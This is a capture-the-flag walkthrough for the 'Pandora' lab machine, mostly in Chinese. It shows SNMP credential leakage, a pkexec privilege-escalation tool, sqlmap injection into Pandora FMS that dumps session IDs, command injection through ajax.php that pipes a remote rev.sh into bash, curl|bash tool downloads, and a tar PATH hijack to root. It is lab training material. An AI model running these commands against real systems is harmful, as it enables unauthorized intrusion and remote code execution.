[Meachines] [Easy] Pandora SNMP+TRP00F权限提升+ktor-HTTP服务扫描+Pandora Fms SQLI-R…

2025-02-14 32 0

Information Gathering

IP Address Opening Ports
10.10.11.136 TCP:22,80,161

$ ip='10.10.11.136'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24c295a5c30b3ff3173c68d7af2b5338 (RSA)
|   256 b1417799469a6c5dd2982fc0329ace03 (ECDSA)
|_  256 e736433ba9478a190158b2bc89f65108 (ED25519)
80/tcp  open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
161/tcp open snmp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SNMP

http://10.10.11.136/

[Meachines] [Easy] Pandora SNMP+TRP00F权限提升+ktor-HTTP服务扫描+Pandora Fms SQLI-R…插图

$ snmpwalk -v 1 -c public 10.10.11.136

[Meachines] [Easy] Pandora SNMP+TRP00F权限提升+ktor-HTTP服务扫描+Pandora Fms SQLI-R…插图1

Username: daniel
Password: HotelBabylon23

[Meachines] [Easy] Pandora SNMP+TRP00F权限提升+ktor-HTTP服务扫描+Pandora Fms SQLI-R…插图2

TRP00F

https://github.com/MartinxMax/trp00f

$ python3 trp00f.py --lhost 10.10.16.28 --lport 10000 --rhost 10.10.16.28 --rport 10032 --http 9999

[!] Do you want to exploit the vulnerability in file ‘pkexec’ ? (y/n) >y

[Meachines] [Easy] Pandora SNMP+TRP00F权限提升+ktor-HTTP服务扫描+Pandora Fms SQLI-R…插图3

Lateral movement && Pandora Fms SQLI & RCE

https://github.com/MartinxMax/KTOR/blob/main/ktor.sh

$ curl http://10.10.16.28/ktor.sh|bash -s -- -l -p all

[Meachines] [Easy] Pandora SNMP+TRP00F权限提升+ktor-HTTP服务扫描+Pandora Fms SQLI-R…插图4

$ ssh -L 9999:localhost:80 daniel@10.10.11.136

[Meachines] [Easy] Pandora SNMP+TRP00F权限提升+ktor-HTTP服务扫描+Pandora Fms SQLI-R…插图5

[Meachines] [Easy] Pandora SNMP+TRP00F权限提升+ktor-HTTP服务扫描+Pandora Fms SQLI-R…插图6

$ sqlmap --url="http://127.0.0.1:9999/pandora_console/include/chart_generator.php?session_id=''" --batch --dbs

[Meachines] [Easy] Pandora SNMP+TRP00F权限提升+ktor-HTTP服务扫描+Pandora Fms SQLI-R…插图7

$ sqlmap --url="http://127.0.0.1:9999/pandora_console/include/chart_generator.php?session_id=''" --batch -D pandora -T tsessions_php --dump

[Meachines] [Easy] Pandora SNMP+TRP00F权限提升+ktor-HTTP服务扫描+Pandora Fms SQLI-R…插图8

session:g4e01qdgk36mfdh90hvcc54umq

http://127.0.0.1:9999/pandora_console/include/chart_generator.php?session_id=g4e01qdgk36mfdh90hvcc54umq

[Meachines] [Easy] Pandora SNMP+TRP00F权限提升+ktor-HTTP服务扫描+Pandora Fms SQLI-R…插图9

$ curl -X POST "http://localhost:9999/pandora_console/ajax.php" \
     -H "Host: localhost:9999" \
     -H "User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:91.0) Gecko/20100101 Firefox/91.0" \
     -H "Accept: application/json, text/javascript, */*; q=0.01" \
     -H "Accept-Language: en-US,en;q=0.5" \
     -H "Accept-Encoding: gzip, deflate" \
     -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
     -H "X-Requested-With: XMLHttpRequest" \
     -H "Origin: http://localhost:9999" \
     -H "Connection: close" \
     -H "Referer: http://localhost:9999/pandora_console/index.php?sec=eventos&sec2=operation/events/events" \
     -H "Cookie: PHPSESSID=g4e01qdgk36mfdh90hvcc54umq" \
     -H "Sec-Fetch-Dest: empty" \
     -H "Sec-Fetch-Mode: cors" \
     -H "Sec-Fetch-Site: same-origin" \
     -d "page=include%2fajax%2fevents&perform_event_response=10000000&target=whoami&response_id=1"

[Meachines] [Easy] Pandora SNMP+TRP00F权限提升+ktor-HTTP服务扫描+Pandora Fms SQLI-R…插图10

$ curl -X POST "http://localhost:9999/pandora_console/ajax.php" \
     -H "Host: localhost:9999" \
     -H "User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:91.0) Gecko/20100101 Firefox/91.0" \
     -H "Accept: application/json, text/javascript, */*; q=0.01" \
     -H "Accept-Language: en-US,en;q=0.5" \
     -H "Accept-Encoding: gzip, deflate" \
     -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
     -H "X-Requested-With: XMLHttpRequest" \
     -H "Origin: http://localhost:9999" \
     -H "Connection: close" \
     -H "Referer: http://localhost:9999/pandora_console/index.php?sec=eventos&sec2=operation/events/events" \
     -H "Cookie: PHPSESSID=g4e01qdgk36mfdh90hvcc54umq" \
     -H "Sec-Fetch-Dest: empty" \
     -H "Sec-Fetch-Mode: cors" \
     -H "Sec-Fetch-Site: same-origin" \
     -d "page=include%2fajax%2fevents&perform_event_response=10000000&target=curl+http://10.10.16.28/rev.sh|bash&response_id=1"

[Meachines] [Easy] Pandora SNMP+TRP00F权限提升+ktor-HTTP服务扫描+Pandora Fms SQLI-R…插图11

User.txt

b4989b8688521476b6c5685a3b020269

Privilege Escalation:Breaking out from the restricted shell environment && Bin RE && Path Hijack &&

[Meachines] [Easy] Pandora SNMP+TRP00F权限提升+ktor-HTTP服务扫描+Pandora Fms SQLI-R…插图12

/usr/bin/pandora_backup

该文件具有S位,但执行时候提示权限不足,很明显这里我们是一个受限Shell

[Meachines] [Easy] Pandora SNMP+TRP00F权限提升+ktor-HTTP服务扫描+Pandora Fms SQLI-R…插图13

通过ssh-keygen生成公钥放到matt用户.ssh目录,ssh连接

$ ssh matt@127.0.0.1

[Meachines] [Easy] Pandora SNMP+TRP00F权限提升+ktor-HTTP服务扫描+Pandora Fms SQLI-R…插图14

[Meachines] [Easy] Pandora SNMP+TRP00F权限提升+ktor-HTTP服务扫描+Pandora Fms SQLI-R…插图15

将/usr/bin/pandora_backup复制,进行逆向分析

[Meachines] [Easy] Pandora SNMP+TRP00F权限提升+ktor-HTTP服务扫描+Pandora Fms SQLI-R…插图16

我们可以通过劫持Tar命令来获取shell

$ export PATH=/tmp:$PATH

$ echo -e '#!/bin/bash\n/bin/bash' > /tmp/tar

$ /usr/bin/pandora_backup

[Meachines] [Easy] Pandora SNMP+TRP00F权限提升+ktor-HTTP服务扫描+Pandora Fms SQLI-R…插图17

Root.txt

208a884a2a993e53704537085c4799d8

相关文章:

  1. [Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…
  2. [Meachines] [Easy] Academy Laravel-RCE+TRP00F权限提升+audit服务日志权限提升+composer权限提…
  3. [Meachines] [Easy] Curling +zip文件嵌套+TRP00F权限提升+CURL滥用文件读取+sysinfo-SSH后门权限提升
  4. [Vulnhub] digitalworld.local-JOY snmp+ProFTPD权限提升
  5. KTOR:高效的Linux横向移动与无文件落地HTTP服务扫描工具

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

4A测评
网络安全
0 0

相关文章

Shellcode加密混淆技术全解析
绕过WPS Office沙箱和Windows Defender的恶意宏攻击分析
Web源码泄露姿势 | 如何寻找泄露源码及黑灰源码
利用隐形Unicode字符的钓鱼攻击:一种新的JS混淆技术
AI比赛大杀器XGBoost结合ast抽象语法树批量识别恶意php文件
语音网络钓鱼新动向:DarkGate恶意软件入侵案例剖析

发布评论